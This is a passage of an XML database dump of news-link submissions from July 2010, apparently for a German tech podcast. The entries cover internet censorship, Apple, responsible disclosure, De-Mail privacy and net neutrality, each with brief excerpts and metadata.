&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theage.com.au/technology/technology-news/no-minister-90-of-web-snoop-document-censored-to-stop--premature-unnecessary-debate-20100722-10mxo.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/23/australian-government-blocks-out-90-of-document-o.png</field><field type="SlugField" name="slug">australian-government-blocks-out-90-of-document-o</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-23 16:52:48</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">australia, censorship, filter, foi, free speech</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="318" model="submitter.newsentry"><field type="CharField" name="title">iPhone : 15-Jähriger trickste Apple aus | Digital | ZEIT ONLINE</field><field type="TextField" name="excerpt">Typ hat in iPhone Handylight teathering als easter egg eingebaut.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Typ hat in iPhone Handylight teathering als easter egg eingebaut.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.zeit.de/digital/mobil/2010-07/handylight-appstore-tethering</field><field type="FileField" name="page_screenshot">page_shots/2010/07/23/iphone-15-jahriger-trickste-apple-aus-digital.png</field><field type="SlugField" name="slug">iphone-15-jahriger-trickste-apple-aus-digital</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-23 01:20:04</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">apple iphone</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="317" model="submitter.newsentry"><field type="CharField" name="title">Responsible Disclosure ist jetzt Coordinated Vulnerability Disclosure</field><field type="TextField" name="excerpt">MS erfindet ein neues Wort für Responsible Disclosure: Coordinated Vulnerability Disclosure - sonst ändert sich nix.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;MS erfindet ein neues Wort für Responsible Disclosure: Coordinated Vulnerability Disclosure - sonst ändert sich nix.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://blogs.technet.com/b/msrc/archive/2010/07/22/announcing-coordinated-vulnerability-disclosure.aspx</field><field type="FileField" name="page_screenshot">page_shots/2010/07/22/no_page_shot.png</field><field type="SlugField" name="slug">responsible-disclosure-ist-jetzt-coordinated-vulne</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-22 21:45:14</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">fulldisclosure</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="316" model="submitter.newsentry"><field type="CharField" name="title">Internet erst ab 22 Uhr geoeffnet</field><field type="TextField" name="excerpt">Sendung über die franz. Revolution erst ab 22 Uhr abrufbar. m( WTF!</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Sendung über die franz. Revolution erst ab 22 Uhr abrufbar. m( WTF!
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.ardmediathek.de/ard/servlet/content/3517136?documentId=4970468</field><field type="FileField" name="page_screenshot">page_shots/2010/07/22/internet-erst-ab-22-uhr-geoeffnet.png</field><field type="SlugField" name="slug">internet-erst-ab-22-uhr-geoeffnet</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-22 18:56:45</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">censorship</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="315" model="submitter.newsentry"><field type="CharField" name="title">Apple the new world leader in software insecurity</field><field type="TextField" name="excerpt">Apple now 1st in Software vulnerabilities. Even beats Oracle. MS 3rd</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Apple now 1st in Software vulnerabilities. Even beats Oracle. MS 3rd
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/security/news/2010/07/apple-the-new-world-leader-in-software-insecurity.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/07/22/apple-the-new-world-leader-in-software-insecurity.png</field><field type="SlugField" name="slug">apple-the-new-world-leader-in-software-insecurity</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-22 01:00:01</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">vulnerability</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="314" model="submitter.newsentry"><field type="CharField" name="title">Dell warns on spyware infected server motherboards • The Register</field><field type="TextField" name="excerpt">Dell liefert Motherboards mit Malware aus. pre0wned of the month award</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Dell liefert Motherboards mit Malware aus. pre0wned of the month award
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/07/21/dell_server_warning/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/22/dell-warns-on-spyware-infected-server-motherboards.png</field><field type="SlugField" name="slug">dell-warns-on-spyware-infected-server-motherboards</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-22 00:29:42</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">pre0wned</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="313" model="submitter.newsentry"><field type="CharField" name="title">Google Online Security Blog: Rebooting Responsible Disclosure: a focus on protecting end users</field><field type="TextField" name="excerpt">60 Tage für responsible disclosure by Google. Für Chrome-Bugs gibt es jetzt 3133.7 USD.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;60 Tage für responsible disclosure by Google. Für Chrome-Bugs gibt es jetzt 3133.7 USD.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://googleonlinesecurity.blogspot.com/2010/07/rebooting-responsible-disclosure-focus.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/21/google-online-security-blog-rebooting-responsible.png</field><field type="SlugField" name="slug">google-online-security-blog-rebooting-responsible</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-21 22:43:16</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">fulldisclosure</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="312" model="submitter.newsentry"><field type="CharField" name="title">How a 15-yo Kid Tricked Apple With a Disguised iPhone Tethering App</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://gizmodo.com/5592521/how-a-guy-tricked-apple-with-a-disguised-iphone-tethering-app?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed%3A+gizmodo%2Ffull+%28Gizmodo%29</field><field type="FileField" name="page_screenshot">page_shots/2010/07/21/how-a-15-yo-kid-tricked-apple-with-a-disguised-iph.png</field><field type="SlugField" name="slug">how-a-15-yo-kid-tricked-apple-with-a-disguised-iph</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">14</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-21 18:35:58</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="311" model="submitter.newsentry"><field type="CharField" name="title"> De-Mail: Freund liest mit? : netzpolitik.org</field><field type="TextField" name="excerpt">de-fail scheint nicht ende-zu-ende zu verschlüsseln</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;de-fail scheint nicht ende-zu-ende zu verschlüsseln
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/de-mail-freund-liest-mit/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/21/de-mail-freund-liest-mit-netzpolitikorg.png</field><field type="SlugField" name="slug">de-mail-freund-liest-mit-netzpolitikorg</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-21 15:31:08</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">de-mail</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="9"></object></field></object><object pk="310" model="submitter.newsentry"><field type="CharField" name="title">W-Lan-Erfassung: Apple nutzt iPhone-Besitzer als Umgebungsscanner - SPIEGEL ONLINE - Nachrichten - Netzwelt</field><field type="TextField" name="excerpt">Apple scannt auch WLAN etc. und schickt die Daten heim</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Apple scannt auch WLAN etc. und schickt die Daten heim
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.spiegel.de/netzwelt/web/0,1518,707417,00.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/20/w-lan-erfassung-apple-nutzt-iphone-besitzer-als-u.png</field><field type="SlugField" name="slug">w-lan-erfassung-apple-nutzt-iphone-besitzer-als-u</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-20 18:29:55</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">apple gsm wlan</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="309" model="submitter.newsentry"><field type="CharField" name="title">Telepolis pnews: Antiterrorgesetz dient britischen Kommunen zum Durchsuchen von Mülltonnen</field><field type="TextField" name="excerpt">Mit anti-terror gesetz Mülltonnen durchschnüffelt</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Mit anti-terror gesetz Mülltonnen durchschnüffelt
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/tp/blogs/8/148047</field><field type="FileField" name="page_screenshot">page_shots/2010/07/20/telepolis-pnews-antiterrorgesetz-dient-britischen.png</field><field type="SlugField" name="slug">telepolis-pnews-antiterrorgesetz-dient-britischen</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-20 17:59:56</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">terror trashbin uk</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="308" model="submitter.newsentry"><field type="CharField" name="title">EU führt Open-Source-Projekte fort</field><field type="TextField" name="excerpt">Die Europäische Union hat bekanntgegeben, mehrere ihrer Open-Source-Projekte in den nächsten Jahren fortsetzen zu wollen. Für Dienste wie OSOR.eu und SEMIC.eu sollen über 3,3 Millionen Euro bereitgestellt werden.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die Europäische Union hat bekanntgegeben, mehrere ihrer Open-Source-Projekte in den nächsten Jahren fortsetzen zu wollen. Für Dienste wie OSOR.eu und SEMIC.eu sollen über 3,3 Millionen Euro bereitgestellt werden.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.pro-linux.de/news/1/15928/eu-fuehrt-open-source-projekte-fort.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/20/eu-fuhrt-open-source-projekte-fort.png</field><field type="SlugField" name="slug">eu-fuhrt-open-source-projekte-fort</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-20 09:28:20</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">e-goverment, eu, linux, open source</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="307" model="submitter.newsentry"><field type="CharField" name="title">CCC | Forderungen für ein lebenswertes Netz </field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://ccc.de/de/updates/2010/forderungen-lebenswertes-netz</field><field type="FileField" name="page_screenshot">page_shots/2010/07/20/ccc-forderungen-fur-ein-lebenswertes-netz.png</field><field type="SlugField" name="slug">ccc-forderungen-fur-ein-lebenswertes-netz</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-20 08:18:53</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">ccc thesen</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="306" model="submitter.newsentry"><field type="CharField" name="title">Neue Trendsportart: Facebook als Datenbank benutzen.</field><field type="TextField" name="excerpt">Bei dem Ministerium hatte sich ein Psychotherapeut gemeldet, der offenbar seine Patientendaten mit Facebook synchronisiert hat. Anschließend hätten sich seine Patienten gewundert, dass sie andere Patienten als Freundschaftsvorschläge von Facebook bekamen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Bei dem Ministerium hatte sich ein Psychotherapeut gemeldet, der offenbar seine Patientendaten mit Facebook synchronisiert hat. Anschließend hätten sich seine Patienten gewundert, dass sie andere Patienten als Freundschaftsvorschläge von Facebook bekamen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://blog.fefe.de/?ts=b2baf2be</field><field type="FileField" name="page_screenshot">page_shots/2010/07/19/neue-trendsportart-facebook-als-datenbank-benutze.png</field><field type="SlugField" name="slug">neue-trendsportart-facebook-als-datenbank-benutze</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">15</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-19 16:20:01</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="305" model="submitter.newsentry"><field type="CharField" name="title">D: Kriminalbeamte für Internet-Ausweispflicht - futurezone.ORF.at</field><field type="TextField" name="excerpt">Ausweispflicht im Internet, gefordert vom BDK m(</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Ausweispflicht im Internet, gefordert vom BDK m(
&lt;/p&gt;</field><field type="CharField" name="external_url">http://futurezone.orf.at/stories/1654127/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/17/d-kriminalbeamte-fur-internet-ausweispflicht-f.png</field><field type="SlugField" name="slug">d-kriminalbeamte-fur-internet-ausweispflicht-f</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-17 14:51:19</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">bdk passport</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="304" model="submitter.newsentry"><field type="CharField" name="title">Cyber-Spanner beobachtet Schülerinnen über deren Webcams</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Cyber-Spanner-beobachtet-Schuelerinnen-ueber-deren-Webcams-1039630.html/from/atom10</field><field type="FileField" name="page_screenshot">page_shots/2010/07/16/cyber-spanner-beobachtet-schulerinnen-uber-deren-w.png</field><field type="SlugField" name="slug">cyber-spanner-beobachtet-schulerinnen-uber-deren-w</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">15</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-16 15:45:44</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="303" model="submitter.newsentry"><field type="CharField" name="title">DNSSEC in der DNS-Rootzone gestartet</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/DNSSEC-in-der-DNS-Rootzone-gestartet-1039401.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/16/dnssec-in-der-dns-rootzone-gestartet.png</field><field type="SlugField" name="slug">dnssec-in-der-dns-rootzone-gestartet</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">15</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-16 13:24:40</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="302" model="submitter.newsentry"><field type="CharField" name="title"> Droid X actually self-destructs if you try to mod it </field><field type="TextField" name="excerpt">"If the eFuse fails to verify [the firmware information (what we call ROMS), the kernel information, and the bootloader version], then the eFuse receives a command to 'blow the fuse' or 'trip the fuse.' This results in the booting process becoming corrupted, followed by a permanent bricking of the phone. This FailSafe is activated anytime the bootloader is tampered with or any of the above three parts of the phone has been tampered with."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;"If the eFuse fails to verify [the firmware information (what we call ROMS), the kernel information, and the bootloader version], then the eFuse receives a command to 'blow the fuse' or 'trip the fuse.' This results in the booting process becoming corrupted, followed by a permanent bricking of the phone. This FailSafe is activated anytime the bootloader is tampered with or any of the above three parts of the phone has been tampered with."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.mobilecrunch.com/2010/07/14/droid-x-actually-self-destructs-if-you-try-to-mod-it/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/15/droid-x-actually-self-destructs-if-you-try-to-mo.png</field><field type="SlugField" name="slug">droid-x-actually-self-destructs-if-you-try-to-mo</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-15 22:08:09</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">android motorola</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="301" model="submitter.newsentry"><field type="CharField" name="title">Chile becomes first country to guarantee net neutrality, we start thinking about moving -- Engadget</field><field type="TextField" name="excerpt">Net neutrality: you want it, we want it, ISPs pretty much hate it. Chilean politicians? Those guys love the stuff! The Board of the Chamber of Deputies voted almost unanimously to to pass Bulletin 4915 which, among other things, forces an ISP to:
...ensure access to all types of content, services or applications available on the network and offer a service that does not distinguish content, applications or services, based on the source of it or their property.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Net neutrality: you want it, we want it, ISPs pretty much hate it. Chilean politicians? Those guys love the stuff! The Board of the Chamber of Deputies voted almost unanimously to to pass Bulletin 4915 which, among other things, forces an ISP to:
...ensure access to all types of content, services or applications available on the network and offer a service that does not distinguish content, applications or services, based on the source of it or their property.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.engadget.com/2010/07/15/chile-becomes-first-country-to-guarantee-net-neutrality-we-star/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/15/chile-becomes-first-country-to-guarantee-net-neutr.png</field><field type="SlugField" name="slug">chile-becomes-first-country-to-guarantee-net-neutr</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-15 21:52:44</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">netneutrality</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="300" model="submitter.newsentry"><field type="CharField" name="title">Datenschutzprobleme bei DE-Mail</field><field type="TextField" name="excerpt">sieben lesenswerte punkte, warum man die jetzt gestartete DE-Mail aus Datenschutzgründen boykottieren sollte</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;sieben lesenswerte punkte, warum man die jetzt gestartete DE-Mail aus Datenschutzgründen boykottieren sollte
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.daten-speicherung.de/index.php/boykottiert-das-glaeserne-de-mail/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/15/datenschutzprobleme-bei-de-mail.png</field><field type="SlugField" name="slug">datenschutzprobleme-bei-de-mail</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">15</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-15 13:47:46</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">de-mail</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="299" model="submitter.newsentry"><field type="CharField" name="title">Thousands of laptops stolen from US military contractor | Security Threats | ZDNet UK</field><field type="TextField" name="excerpt">Over 3,000 laptops were stolen from a military contractor for the US Special Operations Command in March</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Over 3,000 laptops were stolen from a military contractor for the US Special Operations Command in March
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.zdnet.co.uk/news/security-threats/2010/07/14/thousands-of-laptops-stolen-from-us-military-contractor-40089534/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/15/thousands-of-laptops-stolen-from-us-military-contr.png</field><field type="SlugField" name="slug">thousands-of-laptops-stolen-from-us-military-contr</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-15 09:53:14</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">military</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="10"></object></field></object><object pk="298" model="submitter.newsentry"><field type="CharField" name="title">Daten-Speicherung.de &amp;#8211; minimum data, maximum privacy &amp;raquo; Boykottiert das gläserne De-Mail!</field><field type="TextField" name="excerpt">Boykott DE-Mail, 10 Gründe dagagen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Boykott DE-Mail, 10 Gründe dagagen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.daten-speicherung.de/index.php/boykottiert-das-glaeserne-de-mail/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/14/daten-speicherungde-8211-minimum-data-maximum.png</field><field type="SlugField" name="slug">daten-speicherungde-8211-minimum-data-maximum</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-14 23:08:04</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">boycott de-mail</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="297" model="submitter.newsentry"><field type="CharField" name="title">BBC News - China Green Dam web filter teams 'face funding crisis'</field><field type="TextField" name="excerpt">Green Dam S/W maker looses founding 'cause of failure.. In .de T Systems would have got more money.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Green Dam S/W maker looses founding 'cause of failure.. In .de T Systems would have got more money.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://news.bbc.co.uk/2/hi/world/asia_pacific/10614674.stm</field><field type="FileField" name="page_screenshot">page_shots/2010/07/13/bbc-news-china-green-dam-web-filter-teams-face.png</field><field type="SlugField" name="slug">bbc-news-china-green-dam-web-filter-teams-face</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-13 18:31:18</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">censorship china filter greendam</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="296" model="submitter.newsentry"><field type="CharField" name="title">heise online - 15 Jahre &amp;quot;.mp3&amp;quot;</field><field type="TextField" name="excerpt">15 Jahre MP3</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;15 Jahre MP3
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/15-Jahre-mp3-1037148.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/13/heise-online-15-jahre-quotmp3quot.png</field><field type="SlugField" name="slug">heise-online-15-jahre-quotmp3quot</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-13 16:28:10</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">birthday mp3</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="6"></object></field></object><object pk="295" model="submitter.newsentry"><field type="CharField" name="title">apple loescht Kritik</field><field type="TextField" name="excerpt">Apple löscht Verweis auf US: Stiftung Warentest Bericht.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Apple löscht Verweis auf US: Stiftung Warentest Bericht.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.spiegel.de/netzwelt/web/0,1518,706189,00.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/13/apple-loescht-kritik.png</field><field type="SlugField" name="slug">apple-loescht-kritik</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-13 14:56:23</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">apple iphone</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="294" model="submitter.newsentry"><field type="CharField" name="title">Microsoft seeks patent on ebook page flip • The Register</field><field type="TextField" name="excerpt">Page flip patent for ebook readers m(</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Page flip patent for ebook readers m(
